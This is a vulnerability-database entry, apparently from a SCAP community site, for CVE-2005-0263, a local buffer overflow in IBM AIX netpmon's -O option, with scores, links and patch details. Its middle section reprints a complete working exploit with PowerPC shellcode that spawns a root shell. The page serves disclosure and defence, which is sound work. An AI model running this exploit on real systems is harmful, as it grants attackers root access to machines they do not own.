CVE-2005-0263
CVSS 7.2
Published: 2005-05-02 00:00:00
Last modified: 2008-09-05 16:45:47
NMCOE

[Original] Buffer overflow in netpmon on AIX 5.1, 5.2, and 5.3 allows local users to execute arbitrary code via a long -O argument.


[CNNVD] IBM AIX netpmon Local Buffer Overflow Vulnerability (CNNVD-200505-507)

        IBM AIX is a commercial operating system.
        IBM AIX netpmon handles the -O option incorrectly; a local attacker can exploit this flaw to carry out a buffer overflow attack and possibly gain root privileges. netpmon is used to monitor network I/O and network-related CPU usage. Because the argument of the -O option is not subjected to adequate buffer bounds checking, passing an overly long argument as the value of -O can trigger a buffer overflow and possibly yield root privileges.
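The description above comes down to one coding defect: an option value copied into a fixed-size buffer without checking its length. The following C example is added here for illustration; it is not netpmon's source (which is not on this page) and not part of this record. It shows the unbounded copy pattern next to a length-checked routine and a minimal option loop that refuses an over-long -O value instead of writing it. The buffer size, function names and sample argument vectors are constructed for the example.

```c
#include <stdio.h>
#include <string.h>

/* Constructed buffer size for an option value; not netpmon's real layout. */
#define OPT_BUF_SIZE 64

/* The pattern behind this class of bug: an unbounded copy of an option value
 * into a fixed buffer. Any value of OPT_BUF_SIZE bytes or more runs past the
 * end of dst. Kept only for contrast; called below with a short value. */
static void copy_option_unchecked(char *dst, const char *arg)
{
    strcpy(dst, arg);
}

/* Hardened form: measure first, refuse what does not fit together with its
 * terminator, then copy with an explicit length.
 * Returns 0 on success, -1 when the value is too long for dst. */
static int copy_option_checked(char *dst, size_t dst_size, const char *arg)
{
    size_t len = strlen(arg);
    if (dst_size == 0 || len >= dst_size)
        return -1;
    memcpy(dst, arg, len + 1);
    return 0;
}

/* Minimal option loop over an argv: every "-O <value>" goes through the
 * bounded routine, so an over-long value is rejected rather than written.
 * Returns the number of -O values accepted, or -1 at the first rejection
 * (a missing value or an over-long one). */
static int parse_options(int argc, char *const argv[], char *out, size_t out_size)
{
    int accepted = 0;
    for (int i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-O") != 0)
            continue;
        if (i + 1 >= argc)
            return -1;
        if (copy_option_checked(out, out_size, argv[++i]) != 0)
            return -1;
        accepted++;
    }
    return accepted;
}

int main(void)
{
    char opt[OPT_BUF_SIZE];
    char longarg[4 * OPT_BUF_SIZE];

    /* Constructed over-long value: 255 'A' bytes, far beyond OPT_BUF_SIZE. */
    memset(longarg, 'A', sizeof longarg - 1);
    longarg[sizeof longarg - 1] = '\0';

    char *const ok_argv[]  = { "prog", "-O", "cpu", NULL };
    char *const bad_argv[] = { "prog", "-O", longarg, NULL };

    copy_option_unchecked(opt, "cpu"); /* safe only because "cpu" is short */
    printf("unchecked copy of short value: %s\n", opt);
    printf("short -O value accepted: %d\n", parse_options(3, ok_argv, opt, sizeof opt));
    printf("long  -O value accepted: %d\n", parse_options(3, bad_argv, opt, sizeof opt));
    return 0;
}
```

The checked routine returns an error rather than truncating silently, so the caller can report a bad argument; truncation would keep the program memory-safe but could let a later component act on a value the user never passed.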

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can result in a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/o:ibm:aix:5.1  IBM AIX 5.1
cpe:/o:ibm:aix:5.2  IBM AIX 5.2
cpe:/o:ibm:aix:5.3  IBM AIX 5.3

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0263
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0263
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-507
(official data source) CNNVD

- Other links and resources

http://www.idefense.com/application/poi/display?id=197&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050210 IBM AIX netpmon Local Buffer Overflow Vulnerability
http://xforce.iss.net/xforce/xfdb/19278
(UNKNOWN)  XF  ibm-aix-netpmon-bo(19278)
http://www-1.ibm.com/support/search.wss?rs=0&q=IY67807&apar=only
(UNKNOWN)  AIXAPAR  IY67807
http://www-1.ibm.com/support/search.wss?rs=0&q=IY67136&apar=only
(UNKNOWN)  AIXAPAR  IY67136
http://www-1.ibm.com/support/search.wss?rs=0&q=IY67124&apar=only
(UNKNOWN)  AIXAPAR  IY67124
http://www.securityfocus.com/bid/12517
(UNKNOWN)  BID  12517
http://secunia.com/advisories/14237
(UNKNOWN)  SECUNIA  14237

- Vulnerability information

IBM AIX netpmon Local Buffer Overflow Vulnerability
High severity  Buffer overflow
2005-05-02 00:00:00 2005-10-20 00:00:00
Local
        IBM AIX is a commercial operating system.
        IBM AIX netpmon handles the -O option incorrectly; a local attacker can exploit this flaw to carry out a buffer overflow attack and possibly gain root privileges. netpmon is used to monitor network I/O and network-related CPU usage. Because the argument of the -O option is not subjected to adequate buffer bounds checking, passing an overly long argument as the value of -O can trigger a buffer overflow and possibly yield root privileges.

- Advisories and patches

        The vendor has released an upgrade patch that fixes this security issue; patch download links:
        IBM AIX 5.1
        IBM netpmon_efix.tar.Z
        ftp://aix.software.ibm.com/aix/efixes/security/netpmon_efix.tar.Z
        IBM IY67807
        http://www-1.ibm.com/servers/eserver/support/pseries/aixfixes.html
        IBM AIX 5.2
        IBM netpmon_efix.tar.Z
        ftp://aix.software.ibm.com/aix/efixes/security/netpmon_efix.tar.Z
        IBM IY67136
        http://www-1.ibm.com/servers/eserver/support/pseries/aixfixes.html
        IBM AIX 5.3
        IBM netpmon_efix.tar.Z
        ftp://aix.software.ibm.com/aix/efixes/security/netpmon_efix.tar.Z
        IBM IY67124
        http://www-1.ibm.com/servers/eserver/support/pseries/aixfixes.html

- Vulnerability information (1044)

AIX 5.2 netpmon Local Elevated Privileges Exploit (EDBID:1044)
aix local
2005-06-14 Verified
0 intropy
/*
 *
 *    IBM AIX netpmon elevated privileges exploit
 *
 *    I just wanted to play with PowerPC (Tested on 5.2)
 *
 *    intropy (intropy <at> caughq.org)
 *
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

#define DEBUG 1
#define BUFFERSIZE 2048
#define EGGSIZE 2048

#define NOP 0x60
#define ADDRESS 0x2ff22fff-(BUFFERSIZE/2)

char shellcode_binsh[] =
"\x7c\xa5\x2a\x79"     /* xor.    r5,r5,r5             */
"\x40\x82\xff\xfd"     /* bnel    <shellcode>          */
"\x7f\xe8\x02\xa6"     /* mflr    r31                  */
"\x3b\xff\x01\x20"     /* cal     r31,0x120(r31)       */
"\x38\x7f\xff\x08"     /* cal     r3,-248(r31)         */
"\x38\x9f\xff\x10"     /* cal     r4,-240(r31)         */
"\x90\x7f\xff\x10"     /* st      r3,-240(r31)         */
"\x90\xbf\xff\x14"     /* st      r5,-236(r31)         */
"\x88\x5f\xff\x0f"     /* lbz     r2,-241(r31)         */
"\x98\xbf\xff\x0f"     /* stb     r5,-241(r31)         */
"\x4c\xc6\x33\x42"     /* crorc   cr6,cr6,cr6          */
"\x44\xff\xff\x02"     /* svca                         */
"/bin/sh"
"\x05";

unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {
        int count, env_size = strlen(payload) + environment_size + 4 + 1;
        unsigned long address, *ret_addressp;
        
        if (DEBUG) printf("Adding nops to environment buffer...");
        for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {
            *(env_buffer++) = NOP;
        }
        if (DEBUG) printf("size %d...\n", count);
        if (DEBUG) printf("Adding payload to environment buffer...");
        for ( count = 0; count < strlen(payload); count++ ) {
            *(env_buffer++) = payload[count];
        }
        if (DEBUG) printf("size %d...\n", count);

        env_buffer[env_size - 1] = '\0';

        memcpy(env_buffer, "CAU=", 4);

        memset(address_buffer, 'A', buffer_size);

        address = ADDRESS;

        if (DEBUG) printf("Going for address @ 0x%lx\n", address);

        if (DEBUG) printf("Adding return address to buffer...");
        ret_addressp = (unsigned long *)(address_buffer+3);
        for ( count = 0; count < buffer_size; count += 4) {
                *(ret_addressp++) = address;
        }
        if (DEBUG) printf("size %d...\n", count);

        address_buffer[buffer_size - 1] = '\0';

        return( 0 );
}

int main()
{
    char *buffer, *egg;
    char *args[4], *envs[2];   /* four slots: three arguments plus the NULL terminator */

    buffer = (char *)malloc(BUFFERSIZE);
    egg = (char *)malloc(EGGSIZE);

    cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);

    args[0] = "/usr/bin/netpmon";
    args[1] = "-O";
    args[2] = buffer;
    args[3] = NULL;

    envs[0] = egg;
    envs[1] = NULL;

    execve( "/usr/bin/netpmon", args, envs );

    return( 0 );
}

// milw0rm.com [2005-06-14]
		

- Vulnerability information

13697
IBM AIX netpmon -O Parameter Local Overflow
Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- Vulnerability description

- Timeline

2005-02-10 Unknown
2005-06-16 2005-03-23

- Solution

Currently, there are no known upgrades or patches to correct this vulnerability. It is possible to temporarily work around the flaw by implementing the following workaround: Only allow trusted users local access to security critical systems; only allow trusted users access to the "system" group. Alternately, remove the setuid bit from netpmon using chmod u-s /usr/bin/netpmon

- References

- Vulnerability author

Unknown or Incomplete
 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first open Chinese-language community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of MITRE Corporation; their official data sources are maintained on MITRE's related websites.